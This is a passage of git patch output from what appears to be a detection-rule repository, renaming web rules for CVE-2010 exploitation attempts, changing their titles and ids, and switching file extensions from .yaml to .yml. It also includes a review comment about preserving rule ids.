@@ -1,5 +1,5 @@
-title: CVE-2010-1535 exploitation attempt
-id: c0e76601-93b3-4ccf-9d62-95c083ea375d
+title: CVE-2010-1535 Exploitation Attempt
+id: df8fe6a5-b4a6-4d8f-bd32-b6456544d0f8
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1601.yaml b/rules/web/web_cve-2010-1601_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1601.yaml
rename to rules/web/web_cve-2010-1601_exploitation_attempt.yaml
index c414ea49..a715d0fa 100644
--- a/rules/web/web_cve-2010-1601.yaml
+++ b/rules/web/web_cve-2010-1601_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1601 exploitation attempt
-id: ceac625a-0a44-4cab-ba06-1d0d6cacfd89
+title: CVE-2010-1601 Exploitation Attempt
+id: cfd25065-8f6b-4181-bda1-e3507b51b114
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1602.yaml b/rules/web/web_cve-2010-1602_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1602.yaml
rename to rules/web/web_cve-2010-1602_exploitation_attempt.yaml
index 8bc9d320..41d81aec 100644
--- a/rules/web/web_cve-2010-1602.yaml
+++ b/rules/web/web_cve-2010-1602_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1602 exploitation attempt
-id: 63b0013c-c10d-4f45-a0f5-b918514d6721
+title: CVE-2010-1602 Exploitation Attempt
+id: 6a5cc49b-2487-4ec4-8c33-c7d7ba2a3196
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1607.yaml b/rules/web/web_cve-2010-1607_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1607.yaml
rename to rules/web/web_cve-2010-1607_exploitation_attempt.yaml
index 88e7fa06..f95b2209 100644
--- a/rules/web/web_cve-2010-1607.yaml
+++ b/rules/web/web_cve-2010-1607_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1607 exploitation attempt
-id: fc8d65e0-cbed-434d-b881-28aa0346d408
+title: CVE-2010-1607 Exploitation Attempt
+id: 02ad707d-11d8-4654-93b7-668ee425618c
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1657.yaml b/rules/web/web_cve-2010-1657_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1657.yaml
rename to rules/web/web_cve-2010-1657_exploitation_attempt.yaml
index 2dd7914c..ee93c1d6 100644
--- a/rules/web/web_cve-2010-1657.yaml
+++ b/rules/web/web_cve-2010-1657_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1657 exploitation attempt
-id: c32f0956-77ec-4875-8c3b-a84836f489a2
+title: CVE-2010-1657 Exploitation Attempt
+id: adf6f8fb-fe7f-4dc2-af06-7f8885c5e9e9
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1659.yaml b/rules/web/web_cve-2010-1659_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1659.yaml
rename to rules/web/web_cve-2010-1659_exploitation_attempt.yaml
index 89c97e04..dd7a2a06 100644
--- a/rules/web/web_cve-2010-1659.yaml
+++ b/rules/web/web_cve-2010-1659_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1659 exploitation attempt
-id: 10697a46-85ff-499d-8bc5-7b6219da594a
+title: CVE-2010-1659 Exploitation Attempt
+id: bad7c462-464c-4471-8b46-309f295c5f09
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1714.yaml b/rules/web/web_cve-2010-1714_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1714.yaml
rename to rules/web/web_cve-2010-1714_exploitation_attempt.yaml
index dca273b2..6c99e6f8 100644
--- a/rules/web/web_cve-2010-1714.yaml
+++ b/rules/web/web_cve-2010-1714_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1714 exploitation attempt
-id: c754acbf-a0ce-4df6-843e-fb1c55af5373
+title: CVE-2010-1714 Exploitation Attempt
+id: 3d08c7e5-c55f-48e9-90d9-5abfd04e59f0
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1717.yaml b/rules/web/web_cve-2010-1717_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1717.yaml
rename to rules/web/web_cve-2010-1717_exploitation_attempt.yaml
index 992d7d40..20749f73 100644
--- a/rules/web/web_cve-2010-1717.yaml
+++ b/rules/web/web_cve-2010-1717_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1717 exploitation attempt
-id: 54c142a2-27af-4786-a191-12c76398e63f
+title: CVE-2010-1717 Exploitation Attempt
+id: d86b7f81-416b-41e1-81d8-d8b0ce291879
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1718.yaml b/rules/web/web_cve-2010-1718_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1718.yaml
rename to rules/web/web_cve-2010-1718_exploitation_attempt.yaml
index b9306420..c18702c4 100644
--- a/rules/web/web_cve-2010-1718.yaml
+++ b/rules/web/web_cve-2010-1718_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1718 exploitation attempt
-id: 706f8907-5d0a-41db-b93f-f0ee343300b6
+title: CVE-2010-1718 Exploitation Attempt
+id: be0a91f3-44af-423b-ac25-21cac3719194
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1719.yaml b/rules/web/web_cve-2010-1719_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1719.yaml
rename to rules/web/web_cve-2010-1719_exploitation_attempt.yaml
index f11417c4..ad0528de 100644
--- a/rules/web/web_cve-2010-1719.yaml
+++ b/rules/web/web_cve-2010-1719_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1719 exploitation attempt
-id: e11eeb05-00e2-4d00-a572-222e6fe5e716
+title: CVE-2010-1719 Exploitation Attempt
+id: 7e6667ad-773d-430f-803e-b0434e1a18b0
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1722.yaml b/rules/web/web_cve-2010-1722_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1722.yaml
rename to rules/web/web_cve-2010-1722_exploitation_attempt.yaml
index 557f28d2..915152b4 100644
--- a/rules/web/web_cve-2010-1722.yaml
+++ b/rules/web/web_cve-2010-1722_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1722 exploitation attempt
-id: 850fafc1-3151-48b6-b25a-41c3543df57c
+title: CVE-2010-1722 Exploitation Attempt
+id: b6b08f77-dd85-43a1-aba7-2c5019de2cbb
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1875.yaml b/rules/web/web_cve-2010-1875_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1875.yaml
rename to rules/web/web_cve-2010-1875_exploitation_attempt.yaml
index 3a52358d..3327818d 100644
--- a/rules/web/web_cve-2010-1875.yaml
+++ b/rules/web/web_cve-2010-1875_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1875 exploitation attempt
-id: 335b7e25-03d9-40b9-9f3a-82fdfce99af1
+title: CVE-2010-1875 Exploitation Attempt
+id: dd496a1a-4d1a-466b-961a-c5ec583d9c2a
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1953.yaml b/rules/web/web_cve-2010-1953_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1953.yaml
rename to rules/web/web_cve-2010-1953_exploitation_attempt.yaml
index 20e8f0b7..44324f9c 100644
--- a/rules/web/web_cve-2010-1953.yaml
+++ b/rules/web/web_cve-2010-1953_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1953 exploitation attempt
-id: 72936897-8824-4fa8-9ecf-dbbc5f19e53a
+title: CVE-2010-1953 Exploitation Attempt
+id: 57d8ec13-203c-41fd-ab1f-1faae9b50704
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1954.yaml b/rules/web/web_cve-2010-1954_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1954.yaml
rename to rules/web/web_cve-2010-1954_exploitation_attempt.yaml
index 30ecafe1..b8a24efb 100644
--- a/rules/web/web_cve-2010-1954.yaml
+++ b/rules/web/web_cve-2010-1954_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1954 exploitation attempt
-id: 0159a66f-50f9-4485-b681-756fa2d16ce8
+title: CVE-2010-1954 Exploitation Attempt
+id: 75db8c01-6053-40f5-bde9-3eb9b58c6993
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1955.yaml b/rules/web/web_cve-2010-1955_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1955.yaml
rename to rules/web/web_cve-2010-1955_exploitation_attempt.yaml
index f4c424f8..5d45ec58 100644
--- a/rules/web/web_cve-2010-1955.yaml
+++ b/rules/web/web_cve-2010-1955_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1955 exploitation attempt
-id: 9a0064ff-3544-4130-aaec-a8547645f44d
+title: CVE-2010-1955 Exploitation Attempt
+id: c6c7a6f6-53ae-4dd9-b765-369572746618
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1956.yaml b/rules/web/web_cve-2010-1956_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1956.yaml
rename to rules/web/web_cve-2010-1956_exploitation_attempt.yaml
index 7d33c368..be22f9f4 100644
--- a/rules/web/web_cve-2010-1956.yaml
+++ b/rules/web/web_cve-2010-1956_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1956 exploitation attempt
-id: 87412ddd-24a7-4d25-98b7-1df572fcac16
+title: CVE-2010-1956 Exploitation Attempt
+id: 45c57364-0925-43c7-8340-2a4a3d57d080
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1979.yaml b/rules/web/web_cve-2010-1979_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1979.yaml
rename to rules/web/web_cve-2010-1979_exploitation_attempt.yaml
index f91073b5..44b2760f 100644
--- a/rules/web/web_cve-2010-1979.yaml
+++ b/rules/web/web_cve-2010-1979_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1979 exploitation attempt
-id: c56ae44a-bf7b-4643-a2f8-6935f792684c
+title: CVE-2010-1979 Exploitation Attempt
+id: 26d368fb-6ba7-42c0-9fdd-cb704c9b5762
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1980.yaml b/rules/web/web_cve-2010-1980_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1980.yaml
rename to rules/web/web_cve-2010-1980_exploitation_attempt.yaml
index 26b19ee7..74f85631 100644
--- a/rules/web/web_cve-2010-1980.yaml
+++ b/rules/web/web_cve-2010-1980_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1980 exploitation attempt
-id: 33689775-59d1-4bb4-84e6-4c659819e740
+title: CVE-2010-1980 Exploitation Attempt
+id: a3003789-08e5-43c3-bf3b-a41498b626be
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1981.yaml b/rules/web/web_cve-2010-1981_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-1981.yaml
rename to rules/web/web_cve-2010-1981_exploitation_attempt.yaml
index fa7dba17..61351d14 100644
--- a/rules/web/web_cve-2010-1981.yaml
+++ b/rules/web/web_cve-2010-1981_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1981 exploitation attempt
-id: 7b1693c7-dfb2-4bc2-a100-8ff973053339
+title: CVE-2010-1981 Exploitation Attempt
+id: 4819d179-2307-4d81-a96a-a6af63583c90
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-1983.yaml b/rules/web/web_cve-2010-1983_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-1983.yaml
rename to rules/web/web_cve-2010-1983_exploitation_attempt.yaml
index 7ba0e0c8..89e35f9f 100644
--- a/rules/web/web_cve-2010-1983.yaml
+++ b/rules/web/web_cve-2010-1983_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-1983 exploitation attempt
-id: 1ccbc483-aa94-436c-ae2c-c0ff89c88950
+title: CVE-2010-1983 Exploitation Attempt
+id: 34aeb1ba-e6a1-47d8-b705-89f21530c0bc
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-2033.yaml b/rules/web/web_cve-2010-2033_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-2033.yaml
rename to rules/web/web_cve-2010-2033_exploitation_attempt.yaml
index a12fc270..4d19b0ba 100644
--- a/rules/web/web_cve-2010-2033.yaml
+++ b/rules/web/web_cve-2010-2033_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-2033 exploitation attempt
-id: 5f65aa73-1a1f-44f6-9df4-2a593d83ca47
+title: CVE-2010-2033 Exploitation Attempt
+id: 6fe83c91-50fa-4715-abeb-56db4494f0d6
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-2034.yaml b/rules/web/web_cve-2010-2034_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-2034.yaml
rename to rules/web/web_cve-2010-2034_exploitation_attempt.yaml
index 23959387..e4c6c576 100644
--- a/rules/web/web_cve-2010-2034.yaml
+++ b/rules/web/web_cve-2010-2034_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-2034 exploitation attempt
-id: fa7d6a2c-4fef-49cc-9b80-07edaa2687c2
+title: CVE-2010-2034 Exploitation Attempt
+id: ac5d3e21-b01f-4bd3-b541-96107ca1a575
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-2035.yaml b/rules/web/web_cve-2010-2035_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-2035.yaml
rename to rules/web/web_cve-2010-2035_exploitation_attempt.yaml
index 37cd635f..5dc18fac 100644
--- a/rules/web/web_cve-2010-2035.yaml
+++ b/rules/web/web_cve-2010-2035_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-2035 exploitation attempt
-id: 517f9070-1bd8-4e24-ab39-17e41e353ab6
+title: CVE-2010-2035 Exploitation Attempt
+id: a3d33778-c46a-4c7f-93d0-32fa6f44f216
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-2036.yaml b/rules/web/web_cve-2010-2036_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-2036.yaml
rename to rules/web/web_cve-2010-2036_exploitation_attempt.yaml
index 3f7221ee..213ad9a8 100644
--- a/rules/web/web_cve-2010-2036.yaml
+++ b/rules/web/web_cve-2010-2036_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-2036 exploitation attempt
-id: 99462979-ccf6-4c28-a108-fd2d958d39e0
+title: CVE-2010-2036 Exploitation Attempt
+id: ab306706-061e-418d-bcda-f2350f713aa3
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-2122.yaml b/rules/web/web_cve-2010-2122_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-2122.yaml
rename to rules/web/web_cve-2010-2122_exploitation_attempt.yaml
index de75a78a..cbf7c4a1 100644
--- a/rules/web/web_cve-2010-2122.yaml
+++ b/rules/web/web_cve-2010-2122_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-2122 exploitation attempt
-id: 993b1828-3194-4686-87b6-14b893a2ac1e
+title: CVE-2010-2122 Exploitation Attempt
+id: 9c26c662-bd83-453c-bee6-af9ec135f0ed
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-2259.yaml b/rules/web/web_cve-2010-2259_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-2259.yaml
rename to rules/web/web_cve-2010-2259_exploitation_attempt.yaml
index fe81d09a..f270d25c 100644
--- a/rules/web/web_cve-2010-2259.yaml
+++ b/rules/web/web_cve-2010-2259_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-2259 exploitation attempt
-id: 12a63c52-1a42-437a-90cc-950a4cf6b3ab
+title: CVE-2010-2259 Exploitation Attempt
+id: 5122163e-68ae-4091-becc-1ce76da87818
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-2307.yaml b/rules/web/web_cve-2010-2307_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-2307.yaml
rename to rules/web/web_cve-2010-2307_exploitation_attempt.yaml
index e77c8288..aa36c44e 100644
--- a/rules/web/web_cve-2010-2307.yaml
+++ b/rules/web/web_cve-2010-2307_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-2307 exploitation attempt
-id: f2029a95-84dc-427f-a112-f5e373e791ff
+title: CVE-2010-2307 Exploitation Attempt
+id: 5ca51722-d5ab-4fd2-8019-d86ab7c4ab06
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-2682.yaml b/rules/web/web_cve-2010-2682_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-2682.yaml
rename to rules/web/web_cve-2010-2682_exploitation_attempt.yaml
index 6f88ea8d..e37ba64c 100644
--- a/rules/web/web_cve-2010-2682.yaml
+++ b/rules/web/web_cve-2010-2682_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-2682 exploitation attempt
-id: 93d57e84-a8e0-40c6-9d5f-679419117413
+title: CVE-2010-2682 Exploitation Attempt
+id: 9523ed0f-8d29-43d2-ba03-80021ca432e9
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-2861.yaml b/rules/web/web_cve-2010-2861_exploitation_attempt.yaml
similarity index 91%
rename from rules/web/web_cve-2010-2861.yaml
rename to rules/web/web_cve-2010-2861_exploitation_attempt.yaml
index 8e1345f2..02c606e5 100644
--- a/rules/web/web_cve-2010-2861.yaml
+++ b/rules/web/web_cve-2010-2861_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-2861 exploitation attempt
-id: 51f51d47-b13c-4305-b017-f367e790e2cd
+title: CVE-2010-2861 Exploitation Attempt
+id: fe01aa56-4e1f-4a9e-8a91-a54ecb03337e
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-2920.yaml b/rules/web/web_cve-2010-2920_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-2920.yaml
rename to rules/web/web_cve-2010-2920_exploitation_attempt.yaml
index da22cf06..fcae4a86 100644
--- a/rules/web/web_cve-2010-2920.yaml
+++ b/rules/web/web_cve-2010-2920_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-2920 exploitation attempt
-id: e5195f58-f828-4ab2-a609-23eaaf46de44
+title: CVE-2010-2920 Exploitation Attempt
+id: 06d7adfa-1797-499d-a070-afb10935ac16
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-3426.yaml b/rules/web/web_cve-2010-3426_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-3426.yaml
rename to rules/web/web_cve-2010-3426_exploitation_attempt.yaml
index 6bb330c8..a5571a8d 100644
--- a/rules/web/web_cve-2010-3426.yaml
+++ b/rules/web/web_cve-2010-3426_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-3426 exploitation attempt
-id: aa48eb4c-9028-4d0f-b6be-83f52bc805f7
+title: CVE-2010-3426 Exploitation Attempt
+id: 2cb7c37d-e5a6-4dee-a34f-7b96ea217d5b
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-4231.yaml b/rules/web/web_cve-2010-4231_exploitation_attempt.yaml
similarity index 89%
rename from rules/web/web_cve-2010-4231.yaml
rename to rules/web/web_cve-2010-4231_exploitation_attempt.yaml
index a0476b22..216b3351 100644
--- a/rules/web/web_cve-2010-4231.yaml
+++ b/rules/web/web_cve-2010-4231_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-4231 exploitation attempt
-id: c60db1d4-a919-4cbc-bcba-3271b2fd0e6b
+title: CVE-2010-4231 Exploitation Attempt
+id: dbf4c46f-5581-4cbd-8f31-7183bd7bc9eb
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-4617.yaml b/rules/web/web_cve-2010-4617_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-4617.yaml
rename to rules/web/web_cve-2010-4617_exploitation_attempt.yaml
index 33f2bc11..8664cee0 100644
--- a/rules/web/web_cve-2010-4617.yaml
+++ b/rules/web/web_cve-2010-4617_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-4617 exploitation attempt
-id: a7745670-2ad1-411a-8e6d-c43bc9942139
+title: CVE-2010-4617 Exploitation Attempt
+id: 6e5bcbec-b693-4dc2-b093-38e07d0dd405
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
diff --git a/rules/web/web_cve-2010-5278.yaml b/rules/web/web_cve-2010-5278_exploitation_attempt.yaml
similarity index 90%
rename from rules/web/web_cve-2010-5278.yaml
rename to rules/web/web_cve-2010-5278_exploitation_attempt.yaml
index 14abd22d..9226d793 100644
--- a/rules/web/web_cve-2010-5278.yaml
+++ b/rules/web/web_cve-2010-5278_exploitation_attempt.yaml
@@ -1,5 +1,5 @@
-title: CVE-2010-5278 exploitation attempt
-id: 37dbe173-d9f1-400b-862e-cceef489ef6f
+title: CVE-2010-5278 Exploitation Attempt
+id: 88280398-c4a7-498f-9652-86d2448418d1
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
From 276cb597567fa91dd9f5912bd753fd997911b692 Mon Sep 17 00:00:00 2001
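Review bot: The CVE-2010-5278 hunk (and the 4617 one before it) swaps the UUID on the `+id:` line while the visible change is only the title's capitalization, so a consumer that tracks rules by id — the usual way SIEM content is deployed and tuned — will see the old rule (`37dbe173-d9f1-400b-862e-cceef489ef6f`) vanish and an unrelated new one appear, with no way to tell from the diff that they are the same detection. Restore the previous id, or if a new id is deliberate record the old one under `related:` as `- id: 37dbe173-d9f1-400b-862e-cceef489ef6f` with `type: renamed`, and do the same for every rule renamed in this commit. A `modified:` date should accompany the change if the file does not already carry one below the hunk. The detection block of each rule lies outside the hunk and is not reviewable here.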
From: pbssubhash
Date: Sun, 12 Sep 2021 18:41:56 +0530
Subject: [PATCH 0888/1367] yaml to yml ext
---
 ...on_attempt.yaml => web_cve-2010-0943_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-0944_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-0985_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1219_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1304_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1305_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1306_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1307_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1308_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1312_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1313_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1314_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1345_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1353_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1354_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1470_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1471_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1472_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1473_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1474_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1475_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1476_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1494_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1495_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1532_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1533_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1534_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1535_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1601_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1602_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1607_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1657_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1659_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1714_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1717_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1718_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1719_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1722_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1875_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1953_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1954_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1955_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1956_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1979_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1980_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1981_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-1983_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-2033_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-2034_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-2035_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-2036_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-2122_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-2259_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-2307_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-2682_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-2861_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-2920_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-3426_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-4231_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-4617_exploitation_attempt.yml} | 0
 ...on_attempt.yaml => web_cve-2010-5278_exploitation_attempt.yml} | 0
 61 files changed, 0 insertions(+), 0 deletions(-)
 rename rules/web/{web_cve-2010-0943_exploitation_attempt.yaml => web_cve-2010-0943_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-0944_exploitation_attempt.yaml => web_cve-2010-0944_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-0985_exploitation_attempt.yaml => web_cve-2010-0985_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1219_exploitation_attempt.yaml => web_cve-2010-1219_exploitation_attempt.yml} (100%)
